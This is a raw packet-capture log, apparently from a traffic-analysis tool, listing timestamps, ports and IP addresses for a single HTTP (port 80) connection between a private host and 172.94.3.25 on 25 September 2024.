Sep 25, 2024 18:33:54.906327963 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906359911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906359911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.906923056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906936884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906950951 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.906969070 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.907021999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907036066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907051086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907064915 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907093048 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.907093048 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.907217026 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907231092 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907244921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907262087 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907275915 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907289982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907298088 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.907298088 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.907305002 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907321930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907336950 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.907336950 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.907912016 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907926083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907939911 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.907958031 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908005953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908016920 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908020020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908035040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908049107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908065081 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908093929 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908375025 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908390045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908406019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908448935 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908463001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908477068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908478022 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908497095 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908507109 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908507109 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908512115 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908597946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908612967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908627987 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908643007 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908643007 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908721924 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908735991 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908751011 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908771992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.908790112 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.908790112 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.910521984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.910584927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.910603046 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.910640955 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.910656929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:54.910676956 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.910676956 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:54.910753965 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.067281961 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.072735071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.072786093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.072825909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.072886944 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.079770088 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.085369110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085427999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085438013 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.085464954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085516930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085549116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085582972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085587025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.085587025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.085617065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085762024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085794926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085818052 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.085828066 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085860968 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085869074 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.085894108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085910082 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.085926056 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.085958004 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086009979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086047888 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086061001 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086093903 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086132050 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086133957 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086133957 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086165905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086220026 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086256981 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086289883 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086322069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086347103 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086353064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086385965 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086421967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086472988 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086509943 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086512089 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086512089 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086564064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086601019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086633921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086641073 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086641073 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086666107 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086703062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086739063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086776972 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086777925 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086815119 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086823940 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086849928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086885929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086893082 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086918116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086950064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086988926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.086990118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.086990118 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087069035 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087100983 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087132931 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087171078 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087203979 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087208986 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087208986 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087235928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087269068 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087306023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087306976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087306976 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087347031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087450027 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087467909 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087534904 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087568998 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087606907 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087640047 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087672949 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087678909 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087678909 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087726116 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087759972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087794065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087800980 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087800980 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087830067 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087863922 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087888002 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.087897062 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087953091 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087985992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.087996960 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088020086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088052034 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088083982 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088084936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088116884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088155031 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088157892 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088157892 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088339090 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088371992 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088392019 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088407040 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088470936 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088574886 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088608027 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088640928 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088680029 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088762045 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088793993 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088799953 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088799953 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088830948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088865042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088874102 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088896990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088918924 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.088931084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.088969946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089059114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089082956 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089096069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089132071 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089179993 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089179993 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089184999 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089215994 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089251995 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089356899 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089386940 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089390039 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089427948 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089447021 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089484930 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089517117 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089550972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089586020 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089595079 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089595079 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089618921 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089638948 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089658022 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089696884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089730024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089762926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089771032 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089771032 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.089797974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.089952946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090002060 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090013981 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090049982 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090100050 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090111017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090146065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090179920 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090179920 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090214014 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090253115 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090399981 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090431929 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090465069 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090472937 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090497017 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090533018 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090555906 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090569019 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090570927 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090620041 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090651989 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090686083 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090704918 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090722084 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090749025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.090755939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090790033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090935946 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.090991974 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091017008 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091042042 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091073990 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091085911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091085911 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091104984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091140985 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091176033 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091217041 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091217041 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091242075 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091274023 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091306925 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091344118 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091360092 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091378927 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091435909 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091444969 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091489077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091557980 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091649055 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091700077 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091727018 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091738939 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091810942 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.091824055 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091856956 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091888905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.091928959 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092012882 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092053890 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092053890 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092062950 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092094898 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092127085 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092163086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092166901 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092212915 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092219114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092252970 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092286110 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092323065 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092329025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092329025 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092355967 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092390060 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092401028 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092425108 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092477083 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092559099 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092611074 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092645884 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092696905 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092731953 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092731953 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092765093 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092802048 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092803001 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092803001 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092890024 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092921972 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092938900 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.092955112 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.092991114 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093023062 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.093025923 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093059063 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093095064 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093108892 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.093146086 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093179941 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093210936 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093219042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.093219042 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.093246937 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093281984 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093306065 CEST	49699	80	192.168.2.7	172.94.3.25
Sep 25, 2024 18:33:55.093519926 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093575954 CEST	80	49699	172.94.3.25	192.168.2.7
Sep 25, 2024 18:33:55.093628883 CEST	49699	80	192.168.2.7	172.94.3.25
